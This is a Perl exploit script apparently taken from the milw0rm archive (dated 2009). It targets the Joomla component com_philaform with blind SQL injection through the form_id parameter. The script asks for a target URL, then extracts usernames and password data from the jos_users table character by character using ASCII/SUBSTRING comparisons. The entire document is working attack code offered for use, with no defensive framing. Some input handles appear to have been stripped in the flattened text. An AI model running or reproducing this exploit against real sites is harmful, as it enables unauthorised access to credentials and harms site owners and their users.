#!/usr/bin/perl #//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\# #\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////# # # # com_philaform exploit # # # #//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\# #\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////# use HTTP::Request; use LWP::UserAgent; # table : jos_users # column : username and password $cmsapp = '[-x-]'; $vuln = 'index.php?option=com_philaform&Itemid=null&form_id='; $table = 'jos_users'; $regexp = 'No elements defined'; $maxlen = 65; my $OS = "$^O"; if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); } printf "\n $cmsapp [x]====================================================[x] | www[dot]pacenoge[dot]org | [x]====================================================[x] \n"; print " [+] URL Path : "; chomp($web=); print " [+] Valid ID : "; chomp($id=); print " [+] Column : "; chomp($columns=); if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; } print "\n\n [!] Exploiting $target ...\n\n"; &get_data; print "\n\n [!] Exploit completed.\n\n"; sub get_data() { @columns = split(/,/, $columns); foreach $column (@columns) { print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n"; syswrite(STDOUT, " [+] $table\@$column> ", 255); for (my $i=1; $i<=$maxlen; $i++) { my $chr = 0; my $found = 0; my $char = 48; while (!$chr && $char<=90) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } if(!$chr) { $char = 97; while(!$chr && $char<=122) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } } if (!$found) { print "\n"; last; } } } } sub exploit() { my $limit = $_[0]; my $chars = $_[1]; my $blind = '+AND+ASCII(SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1))='.$chars; my $inject = $target.$vuln.$id.$blind; my $content = get_content($inject); return $content; } sub get_content() { my $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(15); my $res = $ua->request($req); if ($res->is_error){ print "\n\n [!] Error, ".$res->status_line.".\n\n"; exit; } return $res->content; } # milw0rm.com [2009-09-09]